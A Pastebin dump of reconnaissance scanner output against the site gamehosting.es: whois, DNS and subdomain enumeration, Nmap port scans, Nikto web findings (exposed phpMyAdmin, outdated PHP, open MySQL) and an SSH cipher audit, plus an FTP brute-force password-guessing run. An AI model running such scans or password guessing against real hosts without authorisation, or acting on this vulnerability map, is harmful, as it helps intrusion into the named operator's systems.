Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Nom de l'hôte gamehosting.es FAI OVH SAS
- Continent Europe Drapeau
- FR
- Pays France Code du pays FR
- Région Inconnu Heure locale 11 Nov 2018 18:19 CET
- Ville Inconnu Code Postal Inconnu
- Adresse IP 5.135.156.30 Latitude 48.858
- Longitude 2.339
- A######################################################################################################################################
- > gamehosting.es
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- Name: gamehosting.es
- Address: 5.135.156.30
- #######################################################################################################################################
- HostIP:5.135.156.30
- HostName:gamehosting.es
- Gathered Inet-whois information for 5.135.156.30
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 5.135.152.0 - 5.135.159.255
- netname: OVH
- descr: OVH SAS
- descr: Dedicated servers
- descr: http://www.ovh.com
- country: FR
- admin-c: OK217-RIPE
- tech-c: OTC2-RIPE
- status: ASSIGNED PA
- mnt-by: OVH-MNT
- created: 2013-08-23T21:30:08Z
- last-modified: 2013-08-23T21:30:08Z
- source: RIPE # Filtered
- role: OVH Technical Contact
- address: OVH SAS
- address: 2 rue Kellermann
- address: 59100 Roubaix
- address: France
- admin-c: OK217-RIPE
- tech-c: GM84-RIPE
- tech-c: SL10162-RIPE
- nic-hdl: OTC2-RIPE
- abuse-mailbox: abuse@ovh.net
- mnt-by: OVH-MNT
- created: 2004-01-28T17:42:29Z
- last-modified: 2014-09-05T10:47:15Z
- source: RIPE # Filtered
- person: Octave Klaba
- address: OVH SAS
- address: 2 rue Kellermann
- address: 59100 Roubaix
- address: France
- phone: +33 9 74 53 13 23
- nic-hdl: OK217-RIPE
- mnt-by: OVH-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2017-10-30T21:44:51Z
- source: RIPE # Filtered
- % Information related to '5.135.0.0/16AS16276'
- route: 5.135.0.0/16
- descr: OVH
- origin: AS16276
- mnt-by: OVH-MNT
- created: 2012-07-06T13:00:08Z
- last-modified: 2012-07-06T13:00:08Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
- Gathered Inic-whois information for gamehosting.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Gathered Netcraft information for gamehosting.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for gamehosting.es
- Netcraft.com Information gathered
- Gathered Subdomain information for gamehosting.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 possible subdomain(s) for host gamehosting.es, Searched 0 pages containing 0 results
- Gathered E-Mail information for gamehosting.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host gamehosting.es, Searched 0 pages containing 0 results
- Gathered TCP Port information for 5.135.156.30
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 80/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 2 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://gamehosting.es
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Game Hosting España
- [+] IP address: 5.135.156.30
- [+] Web Server: Could Not Detect
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- # vestacp autogenerated robots.txt
- User-agent: *
- Crawl-delay: 10
- -----------[end of contents]-------------
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 5.135.156.30
- [i] Country: FR
- [i] State: N/A
- [i] City: N/A
- [i] Latitude: 48.858200
- [i] Longitude: 2.338700
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Sun, 11 Nov 2018 17:25:13 GMT
- [i] Content-Type: text/html
- [i] Content-Length: 19383
- [i] Last-Modified: Tue, 03 Jan 2017 18:35:34 GMT
- [i] ETag: "1801962-4bb7-54534ef012980"
- [i] Accept-Ranges: bytes
- [i] Vary: Accept-Encoding
- [i] Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
- [i] X-Frame-Options: SAMEORIGIN
- [i] X-Content-Type-Options: nosniff
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- gamehosting.es. 3599 IN SOA dns110.ovh.net. tech.ovh.net. 2018081804 86400 3600 3600000 300
- gamehosting.es. 3599 IN NS ns110.ovh.net.
- gamehosting.es. 3599 IN NS dns110.ovh.net.
- gamehosting.es. 3599 IN MX 1 gamehosting.es.
- gamehosting.es. 3599 IN A 5.135.156.30
- gamehosting.es. 599 IN TXT "gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all"
- gamehosting.es. 599 IN TXT "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB"
- gamehosting.es. 599 IN TXT "1|www.gamehosting.es"
- gamehosting.es. 599 IN TXT "gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all"
- gamehosting.es. 599 IN TXT "v=spf1 a mx ~all"
- gamehosting.es. 3599 IN CAA 255 issue "letsencrypt.org"
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 5.135.156.30
- Network = 5.135.156.30 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 5.135.156.30 - 5.135.156.30 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-11 17:25 UTC
- Nmap scan report for gamehosting.es (5.135.156.30)
- Host is up (0.074s latency).
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 1
- [+] Subdomain: www.gamehosting.es
- [-] IP: 213.186.33.5
- #######################################################################################################################################
- [?] Enter the target: http://gamehosting.es/
- [!] IP Address : 5.135.156.30
- [+] Operating System : Ubuntu 12.04"
- [!] gamehosting.es doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for gamehosting.es
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/gamehosting.es
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns110.ovh.net. (213.251.128.154) AS16276 OVH SAS France
- dns110.ovh.net. (213.251.188.154) AS16276 OVH SAS France
- [+] MX Records
- 1 (5.135.156.30) AS16276 OVH SAS France
- [+] Host Records (A)
- gamehosting.esHTTP: (gamehosting.es) (5.135.156.30) AS16276 OVH SAS France
- www.gamehosting.esHTTP: (redirect.ovh.net) (213.186.33.5) AS16276 OVH SAS France
- [+] TXT Records
- "gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all"
- "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB"
- "gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all"
- "1|www.gamehosting.es"
- "v=spf1 a mx ~all"
- [+] DNS Map: https://dnsdumpster.com/static/map/gamehosting.es.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- pixel-1541957128896755-web-@gamehosting.es
- pixel-1541957130276949-web-@gamehosting.es
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 213.186.33.5:www.gamehosting.es
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [-] No fuzzable URLs found
- #######################################################################################################################################
- [+] Hosting Info for Website: gamehosting.es
- [+] Visitors per day: < 200
- [+] IP Address: 5.135.156.30
- [+] Hosting Company: Ovh Sas
- [+] Hosting IP Range: 5.135.0.0 - 5.135.255.255 (65,536 ip)
- [+] Hosting Address: 140 Quai Du Sartel, 59100 Roubaix, France
- [+] Hosting Country: FRA
- [+] Hosting Phone: +33 9 7453 1323, +33 3 2020 0957
- [+] Hosting Website: www.ovh.com
- [+] Hosting CIDR: 5.135.0.0/16
- [+] NS: dns110.ovh.net
- [+] NS: ns110.ovh.net
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> gamehosting.es
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61389
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;gamehosting.es. IN A
- ;; ANSWER SECTION:
- gamehosting.es. 3469 IN A 5.135.156.30
- ;; Query time: 153 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: dim nov 11 12:30:53 EST 2018
- ;; MSG SIZE rcvd: 59
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> +trace gamehosting.es
- ;; global options: +cmd
- . 85816 IN NS f.root-servers.net.
- . 85816 IN NS h.root-servers.net.
- . 85816 IN NS l.root-servers.net.
- . 85816 IN NS i.root-servers.net.
- . 85816 IN NS c.root-servers.net.
- . 85816 IN NS g.root-servers.net.
- . 85816 IN NS k.root-servers.net.
- . 85816 IN NS e.root-servers.net.
- . 85816 IN NS m.root-servers.net.
- . 85816 IN NS a.root-servers.net.
- . 85816 IN NS j.root-servers.net.
- . 85816 IN NS b.root-servers.net.
- . 85816 IN NS d.root-servers.net.
- . 85816 IN RRSIG NS 8 0 518400 20181124050000 20181111040000 2134 . fRNzy/nV2vjSz21ytxw2O+3ud+FbagBcxaPEfbwHnsMwrIouTBnkqROq 5BmwzDgojeg011yR/LWZg0YmnXPQeR8BnF8S2pQMTcOhZ3738x8pmJId YVP6bEWqwmv30N+YPrAqe4hmuFmaYGn0gMjzDXEGYIGHENBZRy8Ir6A+ vF/VRXlBFLKyRtQtSqNnLTlI9xpf5QfqXCT17XcHtjRc9vKDj6w35MFZ YIz0SNuSKizuB8pg4j+SXLryNaANiWd9zt6b6oR4YFPfceX7lmGGRivQ kVjM/EFFAwvi5gQOnJJLJNwUTOjFK7IXwR+C2idFmhAXZ2kdEMJuSTOS U/8CzA==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 140 ms
- es. 172800 IN NS ns1.cesca.es.
- es. 172800 IN NS sns-pb.isc.org.
- es. 172800 IN NS f.nic.es.
- es. 172800 IN NS g.nic.es.
- es. 172800 IN NS a.nic.es.
- es. 172800 IN NS ns3.nic.fr.
- es. 172800 IN NS ns-ext.nic.cl.
- es. 86400 IN DS 44290 8 1 7711F564D55B41C8CE7DFAF4DD323C5B271F86CD
- es. 86400 IN DS 44290 8 2 562EF35E7065588A7178A4BD0155C8527F029C82AA455DD359C84908 B2A7FE17
- es. 86400 IN DS 29450 8 1 417BEAFB46ABF3430B75C5C29AEF785D476B60E1
- es. 86400 IN DS 29450 8 2 8BEC32A2C9CFE42E393BAF81FFE71B521D3E940612A4590B4763ADC5 39E4B563
- es. 86400 IN RRSIG DS 8 1 86400 20181124050000 20181111040000 2134 . Ae9MkKYVhLh1G0deO6QN4jRtGCDCJOn2BE0t/oevz+g4Iko2vjZiKpLj GGCE5ogTwcITfvjnk82/lzc8wZuhpHW1BhWHElOiTg9ykcyoX7CNDQpS wKacsfx2Biuqk0LAr1a2216pKvDffoNUaxaqbRJmvk8q17cqWgfX730T jaK7zpXay54gFgJDEFderWlGFLasFOjESKLzsHx5hWFeu+4xhYcaVopv nG/Hh3UvdhY+RCg+zH5hPPkBa4AxS/3FvD8bsFuiyFLFT0tfV6YhNz/B W5G3JvGhW68Rs0jYoW0Vf9PlbqJX8IS2IkD00QA1E9dKdvJfr8VewwOG +bYZ3g==
- ;; Received 989 bytes from 199.9.14.201#53(b.root-servers.net) in 264 ms
- gamehosting.es. 86400 IN NS dns110.ovh.net.
- gamehosting.es. 86400 IN NS ns110.ovh.net.
- spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 SPOVUI8LLS5HHLJ0I6TEK8ODTJ0PV8PM NS SOA RRSIG DNSKEY NSEC3PARAM
- spo5r5bnu2j5g2posr633lrok075or26.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121051641 20181107010649 64315 es. WibiqeGxP7swWy8WJMC67rD0fXoQlpMxJPJJunU2YlLDMXZ3Fd4U2RK7 rHsIA/dsEO41GCa9V4v9khQBqCohEaxtna2hamwhfax+k2LsNP62oy0S nuP4HSwtH+fc4zBY5w42orQnksL0mxd4WgU0fC/zRJaOc5NelfeKRvM0 GAs=
- mo9dip4huivh1hhlu5j6hgjj2qu63ocu.es. 86400 IN NSEC3 1 1 5 557CEB9FD142AE07 MOBVPQNHULLRM4LL1UVN8005RGNF6O7B NS DS RRSIG
- mo9dip4huivh1hhlu5j6hgjj2qu63ocu.es. 86400 IN RRSIG NSEC3 8 2 86400 20181121110255 20181107045751 64315 es. 2O0omcTApifGn4QwRHI2OsZvhYG/MJLyhQ+jCBLwiaYWTliR4+vpk4Cm m3k3kEAUHMWkKMuoKpecohQ/U2mrv4vr8ZVm8Qn+Tuc08SoRwQkzgsfp PaMTrHa5Zgb2BaUwfSHwHqbD2L74ahoSHeZTiHXhHO+k6dNJHhdOYtNK tGI=
- ;; Received 618 bytes from 200.1.123.14#53(ns-ext.nic.cl) in 344 ms
- gamehosting.es. 3600 IN A 5.135.156.30
- ;; Received 59 bytes from 213.251.128.154#53(ns110.ovh.net) in 140 ms
- #######################################################################################################################################
- Traceroute 'gamehosting.es '
- ---------------------------------------------------------------------------------------------------------------------------------------
- Start: 2018-11-11T17:42:22+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.201 0.0% 3 0.8 0.8 0.8 0.8 0.0
- 2.|-- 45.79.12.0 0.0% 3 0.5 1.5 0.5 2.5 1.0
- 3.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 4.|-- be100-2.dfw-da2-bb1-a9.tx.us 0.0% 3 1.9 1.9 1.8 2.1 0.2
- 5.|-- ash-1-a9.tx.us 0.0% 3 32.1 32.0 31.6 32.3 0.3
- 6.|-- be100-1039.nwk-1-a9.nj.us 0.0% 3 38.1 37.9 37.7 38.1 0.2
- 7.|-- be100-1295.ldn-1-a9.uk.eu 0.0% 3 103.3 103.6 103.3 103.9 0.3
- 8.|-- be100-1041.rbx-g1-nc5.fr.eu 0.0% 3 108.0 108.0 107.6 108.4 0.4
- 9.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 10.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 11.|-- gamehosting.es 0.0% 3 109.8 109.9 109.6 110.4 0.4
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: gamehosting.es
- [-] DNSSEC is not configured for gamehosting.es
- [*] SOA dns110.ovh.net 213.251.188.154
- [*] NS ns110.ovh.net 213.251.128.154
- [*] Bind Version for 213.251.128.154 [Secured]
- [*] NS ns110.ovh.net 2001:41d0:1:199a::1
- [*] NS dns110.ovh.net 213.251.188.154
- [*] Bind Version for 213.251.188.154 [Secured]
- [*] NS dns110.ovh.net 2001:41d0:1:4a9a::1
- [*] MX gamehosting.es 5.135.156.30
- [*] A gamehosting.es 5.135.156.30
- [*] TXT gamehosting.es k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB
- [*] TXT gamehosting.es gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all
- [*] TXT gamehosting.es 1|www.gamehosting.es
- [*] TXT gamehosting.es v=spf1 a mx ~all
- [*] TXT gamehosting.es gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all
- [*] Enumerating SRV Records
- [*] SRV _submission._tcp.gamehosting.es ssl0.ovh.net 193.70.18.144 465 0
- [*] SRV _imaps._tcp.gamehosting.es ssl0.ovh.net 193.70.18.144 993 0
- [+] 2 Records Found
- #######################################################################################################################################
- [*] Processing domain gamehosting.es
- [+] Getting nameservers
- 213.251.128.154 - ns110.ovh.net
- 213.251.188.154 - dns110.ovh.net
- [-] Zone transfer failed
- [+] TXT records found
- "k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4QIU2g8Yv9wPckflL40M+xvJXJ94wpw4FsrIB6iLfFALbpLNWC1WiiHSekUGDVcJBFFbQdLxWZQFMnUAoaVruIqHcH5dRfiHA99njNFVUlG8OXUcV/ZCZjTmxXyDrJp/DHYLetxABZyLroRt89gBPXaDnXRkG5/6FIgIZaX6E8wIDAQAB"
- "gamehosting.es IN TXT v=spf1 include:_spf.google.com ip4:5.135.156.30 ~all"
- "1|www.gamehosting.es"
- "v=spf1 a mx ~all"
- "gamehosting.es IN TXT v=spf1 mx include:_spf.google.com ip4:5.135.156.30 ~all"
- [+] MX records found, added to target list
- 1 gamehosting.es.
- [*] Scanning gamehosting.es for A records
- 5.135.156.30 - gamehosting.es
- 5.135.156.30 - autoconfig.gamehosting.es
- 5.135.156.30 - ftp.gamehosting.es
- 193.70.18.144 - imap.gamehosting.es
- 5.135.156.30 - mail.gamehosting.es
- 5.135.156.30 - ns1.gamehosting.es
- 5.135.156.30 - ns2.gamehosting.es
- 5.135.156.30 - pop3.gamehosting.es
- 5.135.156.30 - server.gamehosting.es
- 5.135.156.30 - smtp.gamehosting.es
- 5.135.156.30 - ssl.gamehosting.es
- 5.135.156.30 - tracker.gamehosting.es
- 213.186.33.5 - www.gamehosting.es
- #######################################################################################################################################
- [+] Testing domain
- www.gamehosting.es 213.186.33.5
- [+] Dns resolving
- Domain name Ip address Name server
- gamehosting.es 5.135.156.30 gamehosting.es
- Found 1 host(s) for gamehosting.es
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on gamehosting.es
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 89.98 seconds
- Subdomain Ip address Name server
- ftp.gamehosting.es 5.135.156.30 gamehosting.es
- imap.gamehosting.es 193.70.18.144 ssl0.ovh.net
- mail.gamehosting.es 5.135.156.30 gamehosting.es
- ns1.gamehosting.es 5.135.156.30 gamehosting.es
- ns2.gamehosting.es 5.135.156.30 gamehosting.es
- pop3.gamehosting.es 5.135.156.30 gamehosting.es
- server.gamehosting.es 5.135.156.30 gamehosting.es
- smtp.gamehosting.es 5.135.156.30 gamehosting.es
- ssl.gamehosting.es 5.135.156.30 gamehosting.es
- tracker.gamehosting.es 5.135.156.30 gamehosting.es
- www.gamehosting.es 213.186.33.5 redirect.ovh.net
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------------------------------------------------------------------------------------------------------------------------------------
- 5.135.156.30 200 alias ftp.gamehosting.es
- 5.135.156.30 200 host gamehosting.es
- 193.70.18.144 301 alias imap.gamehosting.es
- 193.70.18.144 301 host ssl0.ovh.net
- 5.135.156.30 200 alias mail.gamehosting.es
- 5.135.156.30 200 host gamehosting.es
- 5.135.156.30 200 host ns1.gamehosting.es
- 5.135.156.30 200 host ns2.gamehosting.es
- 5.135.156.30 200 alias pop3.gamehosting.es
- 5.135.156.30 200 host gamehosting.es
- 5.135.156.30 200 host server.gamehosting.es nginx
- 5.135.156.30 200 alias smtp.gamehosting.es nginx
- 5.135.156.30 200 host gamehosting.es nginx
- 5.135.156.30 host ssl.gamehosting.es
- 5.135.156.30 200 host tracker.gamehosting.es nginx
- 213.186.33.5 200 host www.gamehosting.es nginx
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> gamehosting.es +dnssec
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6844
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags: do; udp: 4096
- ;; QUESTION SECTION:
- ;gamehosting.es. IN A
- ;; ANSWER SECTION:
- gamehosting.es. 2007 IN A 5.135.156.30
- ;; Query time: 155 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: dim nov 11 13:55:15 EST 2018
- ;; MSG SIZE rcvd: 59
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 5.135.156.30
- + Target Hostname: 5.135.156.30
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /CN=gamehosting.es
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
- + Start Time: 2018-11-11 12:26:15 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: nginx
- + Server leaks inodes via ETags, header found with file /, inode: 25428511, size: 19427, mtime: Sun Apr 22 04:55:09 2018
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + Hostname '5.135.156.30' does not match certificate's names: gamehosting.es
- + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
- + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
- + Uncommon header 'x-dns-prefetch-control' found, with contents: off
- + Cookie roundcube_sessid created without the httponly flag
- + /webmail/: Web based mail package installed.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-3233: /icons/README: Apache default file found.
- + /phpmyadmin/: phpMyAdmin directory found
- + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + 8502 requests: 1 error(s) and 13 item(s) reported on remote host
- + End Time: 2018-11-11 14:14:26 (GMT-5) (6491 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------#######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 5.135.156.30
- + Target Hostname: gamehosting.es
- + Target Port: 80
- + Start Time: 2018-11-11 12:25:48 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + Server leaks inodes via ETags, header found with file /, inode: 25172322, size: 19383, mtime: Tue Jan 3 13:35:34 2017
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
- + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
- + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
- + Uncommon header 'x-dns-prefetch-control' found, with contents: off
- + Cookie roundcube_sessid created without the httponly flag
- + /webmail/: Web based mail package installed.
- + Server banner has changed from '' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-3233: /icons/README: Apache default file found.
- + /phpmyadmin/: phpMyAdmin directory found
- + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + 26227 requests: 0 error(s) and 12 item(s) reported on remote host
- + End Time: 2018-11-11 13:41:31 (GMT-5) (4543 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:26 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.14s latency).
- Not shown: 418 filtered ports, 46 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2525/tcp open ms-v-worlds
- 3306/tcp open mysql
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:27 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- Not shown: 2 filtered ports, 1 closed port
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:27 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD or KnFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 2292 guesses in 193 seconds, average tps: 11.8
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: OpenWrt Kamikaze 7.09 (Linux 2.6.22) (96%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt White Russian 0.9 (Linux 2.4.30) (94%), Linux 2.4.18 (92%), OpenWrt (Linux 3.3) (92%), OpenWrt Attitude Adjustment 12.09 (Linux 3.3) (92%), Linux 3.0 (92%), Crestron XPanel control system (90%), OpenWrt (Linux 2.4.30 - 2.4.34) (89%), OpenWrt (Linux 2.4.32) (89%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 7 hops
- Service Info: OS: Unix
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 122.22 ms 10.248.200.1
- 2 122.24 ms 185.94.189.129
- 3 ...
- 4 133.40 ms 94.23.122.146
- 5 ... 6
- 7 133.43 ms 5.135.156.30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 235.03 seconds
- + -- --=[Port 22 opened... running tests...
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
- (gen) software: OpenSSH 5.9p1
- (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
- `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
